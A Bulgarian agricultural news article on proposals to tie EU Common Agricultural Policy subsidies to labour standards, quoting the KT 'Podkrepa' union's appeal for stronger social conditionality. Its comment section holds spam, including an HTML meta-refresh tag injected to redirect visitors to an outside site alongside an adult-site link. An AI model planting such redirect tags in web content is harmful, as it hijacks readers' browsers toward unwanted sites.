Ще се отнемат ли субсидии заради лоши условия на труд?

Ще се отнемат ли субсидии заради лоши условия на труд?

 

Темата за социалната условност в новата Обща селскостопанска политика (ОСП) може да обърка сметките на фермерите за субсидиите, които ще получават след 2022 г. Европейският парламент (ЕП) предлага следното – директните плащания по ОСП трябва да зависят от спазването на приложимите изисквания към условията на труд и заетост. 

 

Коалиция от 13 държави членки обаче, сред които и България, ще настоява единственото „социално“ искане да бъде работодателите да информират работниците в земеделието за условията на труд. Тяхното искане ще бъде представено на 22 и 23 март, когато ще се проведе среща на Съвета на ЕС.

 

Именно по този повод синдикалнат организация КТ „Подкрепа” излиза с апел към премиера, министрите на труда и на земеделието, да се сложи край на експлоатацията и да се повишат трудовите стандарти в европейското земеделие, като се подкрепи по-строга социална условност в новата ОСП.

 

„В правилата на ОСП са залегнали, напълно справедливо, екологичните стандарти, хуманното отношение към животните, но не и трудовите стандарти, безопасните и здравословни условия на труд, хуманното отношение към човека“, изреждат синдикалистите.

 

Те цитират данни, според които работещите в земеделието на ЕС са над 10 милиона души. 

 

„Това са хора, ангажирани в сезонна работа, на еднодневни трудови договори и други форми на несигурна заетост. Именно там е и огромна част от недекларирания труд. Хората, благодарение на които имаме храна на масата си, често са жертви на експлоатация, на престъпни банди и модерно робство“, продължават от КТ „Подкрепа“.

 

Според тях е важно позицията на ЕП да бъде подкрепена и препотвърдена преди триалога за реформата на ОСП на 26 март. 

 

„Призоваваме ви да настоявате правилата да защитават интересите на работещите в земеделието – работа на светло, осигурителни права, нормално работно време, здравословни и безопасни условия на труд, цивилизовани жилищни условия. Защита на човешките права, без значение дали работникът е местен или идва от друга държава“, посочват още в писмото си синдикалистите.

Следете темата и на cap4us.agri.bg

 

Коментари
sdfasdf
на 11.01.2022 21:15
<meta http-equiv="refresh" content="0; url=https://findi.pro/coment"/> <a href="https://adultsayfa.blogspot.com/" title="adultsayfa">adult sayfa</a>
Andrew Smith
на 01.01.2022 8:31
I will probably be coming back to your weblog for more soon! <a href=https://www.danezon.com/category/tv-series-jackets/hawkeye-outfits/ >Hawkeye 2021 Outfits</a>
Добави коментар